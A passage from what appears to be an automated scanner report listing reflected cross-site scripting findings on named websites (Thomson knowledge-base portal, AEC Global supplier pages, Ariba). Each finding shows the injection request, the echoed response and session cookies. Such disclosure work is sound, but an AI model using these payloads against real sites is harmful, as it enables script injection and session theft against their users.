Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 15:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2083


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>West Research A
...[SNIP]...
<input type="hidden" name="searchtype" value="e1aa7"><script>alert(1)</script>d1bc6a57430">
...[SNIP]...

1.31. http://kbportal.thomson.com/display/2/loginSecure.aspx [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/loginSecure.aspx

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e659"><script>alert(1)</script>5f977f7c25f was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/loginSecure.aspx?cpid=24&t=7e659"><script>alert(1)</script>5f977f7c25f&aid=&searchstring=&searchtype=&searchby=&cat=&catURL= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://kbportal.thomson.com/display/2/loginSecureFrame.aspx?cpid=24&c=&cpc=&cid=&t=&aid=&cat=&catURL=&r=0.585381746292114
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: kbportal.thomson.com
Proxy-Connection: Keep-Alive
Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 15:29:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2083


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>West Research A
...[SNIP]...
<input type="hidden" name="t" value="7e659"><script>alert(1)</script>5f977f7c25f">
...[SNIP]...

1.32. http://kbportal.thomson.com/display/2/loginSecureFrame.aspx [cpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/loginSecureFrame.aspx

Issue detail

The value of the cpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53c85"><script>alert(1)</script>1f1e0f96fd9 was submitted in the cpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/loginSecureFrame.aspx?cpid=53c85"><script>alert(1)</script>1f1e0f96fd9&c=&cpc=&cid=&t=&aid=&cat=&catURL=&r=0.585381746292114 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: kbportal.thomson.com
Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 15:29:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: IWICategory=IWICategory=; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 842


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
</hea
...[SNIP]...
<frame name="CPtopFrame" src="top.aspx?cpid=53c85"><script>alert(1)</script>1f1e0f96fd9" marginwidth="0" marginheight="0" frameborder="no" noresize scrolling="no">
...[SNIP]...

1.33. http://kbportal.thomson.com/display/2/loginSecureFrame.aspx [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/loginSecureFrame.aspx

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a5d6"><script>alert(1)</script>3b0d47b4214 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/loginSecureFrame.aspx?cpid=24&c=&cpc=&cid=&t=8a5d6"><script>alert(1)</script>3b0d47b4214&aid=&cat=&catURL=&r=0.585381746292114 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: kbportal.thomson.com
Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 15:29:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: IWICategory=IWICategory=; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 762


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
</hea
...[SNIP]...
<frame name="CPindexFrame" src="loginSecure.aspx?cpid=24&t=8a5d6"><script>alert(1)</script>3b0d47b4214&aid=&searchstring=&searchtype=&searchby=&cat=&catURL=" marginwidth="0" marginheight="0" frameborder="no">
...[SNIP]...

1.34. http://unitedsupplierdiversity.aecglobal.com/Popup/NaicsCodePopup.aspx [ParentAddFuntionName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://unitedsupplierdiversity.aecglobal.com
Path:   /Popup/NaicsCodePopup.aspx

Issue detail

The value of the ParentAddFuntionName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 988af%3balert(1)//947510d823b was submitted in the ParentAddFuntionName parameter. This input was echoed as 988af;alert(1)//947510d823b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Popup/NaicsCodePopup.aspx?value=&ParentAddFuntionName=AddNaicsCode988af%3balert(1)//947510d823b&SelectionMethod=IFrame HTTP/1.1
Host: unitedsupplierdiversity.aecglobal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://unitedsupplierdiversity.aecglobal.com/Supplier/Supplier_Registration.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5whsceev351pci55rbtlpk45

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 17:42:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37872


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta content="text/h
...[SNIP]...
<script language="javascript" type="text/javascript">
   function NaicsCodeClick(sID, description, annualSales, totalEmployee)
   {    
    var success = false;
   
   success = parent.AddNaicsCode988af;alert(1)//947510d823b(sID, sID + ': ' + description, annualSales, totalEmployee);
   
       
return success;
   }
   </script>
...[SNIP]...

1.35. http://unitedsupplierdiversity.aecglobal.com/Popup/categorypopup.aspx [ParentAddFuntionName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://unitedsupplierdiversity.aecglobal.com
Path:   /Popup/categorypopup.aspx

Issue detail

The value of the ParentAddFuntionName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 83bbe%3balert(1)//256ca66dcfb was submitted in the ParentAddFuntionName parameter. This input was echoed as 83bbe;alert(1)//256ca66dcfb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Popup/categorypopup.aspx?value=&ParentAddFuntionName=_ctl0_content_productservice_categoryListSelector_AddItem_Multiple83bbe%3balert(1)//256ca66dcfb&SelectionMethod=IFrame HTTP/1.1
Host: unitedsupplierdiversity.aecglobal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://unitedsupplierdiversity.aecglobal.com/Supplier/Supplier_Registration.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5whsceev351pci55rbtlpk45

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 17:43:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 527525


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta content="text/h
...[SNIP]...
type="text/javascript">
   function CategoryClick(sID, description, oElement)
   {
       var success = false;
   
   success = parent._ctl0_content_productservice_categoryListSelector_AddItem_Multiple83bbe;alert(1)//256ca66dcfb(sID, description);
   
       
return success;
   }
   </script>
...[SNIP]...

1.36. http://unitedsupplierdiversity.aecglobal.com/Popup/serviceareapopup.aspx [ParentAddFuntionName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://unitedsupplierdiversity.aecglobal.com
Path:   /Popup/serviceareapopup.aspx

Issue detail

The value of the ParentAddFuntionName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b0e2d%3balert(1)//679b28d86ad was submitted in the ParentAddFuntionName parameter. This input was echoed as b0e2d;alert(1)//679b28d86ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Popup/serviceareapopup.aspx?region=Airport&value=&ParentAddFuntionName=_ctl0_content_companydata_airportListSelector_AddItem_Multipleb0e2d%3balert(1)//679b28d86ad&SelectionMethod=IFrame HTTP/1.1
Host: unitedsupplierdiversity.aecglobal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://unitedsupplierdiversity.aecglobal.com/Supplier/Supplier_Registration.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5whsceev351pci55rbtlpk45

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 17:42:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 163700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta content="text/h
...[SNIP]...
ascript" type="text/javascript">
   function ServiceAreaClick( sID, description)
   {    
       var success = false;
   
   success = parent._ctl0_content_companydata_airportListSelector_AddItem_Multipleb0e2d;alert(1)//679b28d86ad(sID, description);
   
       
return success;
   }
   </script>
...[SNIP]...

1.37. http://www.ariba.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78665"><script>alert(1)</script>41aabb2bdbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?78665"><script>alert(1)</script>41aabb2bdbd=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.ariba.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Fservices%25252Fsupport.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252F%2526ot%253DA; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=620

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:10:40 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=692;expires=Wed, 17-Oct-2012 18:10:40 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/index.cfm?78665"><script>alert(1)</script>41aabb2bdbd=1&l=dm" title="Denmark">
...[SNIP]...

1.38. http://www.ariba.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 786c8--><script>alert(1)</script>623065440be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?786c8--><script>alert(1)</script>623065440be=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.ariba.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Fservices%25252Fsupport.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252F%2526ot%253DA; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=620

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:10:43 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=696;expires=Wed, 17-Oct-2012 18:10:43 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/index.cfm?786c8--><script>alert(1)</script>623065440be=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.39. http://www.ariba.com/404.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /404.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 233dc--><script>alert(1)</script>608e4c4a672 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /404.cfm?pageLocation=404&233dc--><script>alert(1)</script>608e4c4a672=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=621; s_cc=true; gpv_pn=%2Findex.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.19.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=36; ALPersonId=13N33417

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:18:02 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=848;expires=Wed, 17-Oct-2012 18:18:02 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/404.cfm?pageLocation=404&233dc--><script>alert(1)</script>608e4c4a672=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.40. http://www.ariba.com/404.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /404.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b688f"><script>alert(1)</script>818d4b4e7c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /404.cfm?pageLocation=404&b688f"><script>alert(1)</script>818d4b4e7c8=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=621; s_cc=true; gpv_pn=%2Findex.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.19.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=36; ALPersonId=13N33417

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:18:00 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=838;expires=Wed, 17-Oct-2012 18:18:00 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/404.cfm?pageLocation=404&b688f"><script>alert(1)</script>818d4b4e7c8=1&l=dm" title="Denmark">
...[SNIP]...

1.41. http://www.ariba.com/404.cfm [pageLocation parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /404.cfm

Issue detail

The value of the pageLocation request parameter is copied into an HTML comment. The payload 18239--><script>alert(1)</script>081c7f68b1c was submitted in the pageLocation parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /404.cfm?pageLocation=40418239--><script>alert(1)</script>081c7f68b1c HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=621; s_cc=true; gpv_pn=%2Findex.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.19.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=36; ALPersonId=13N33417

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:17:58 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=831;expires=Wed, 17-Oct-2012 18:17:58 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
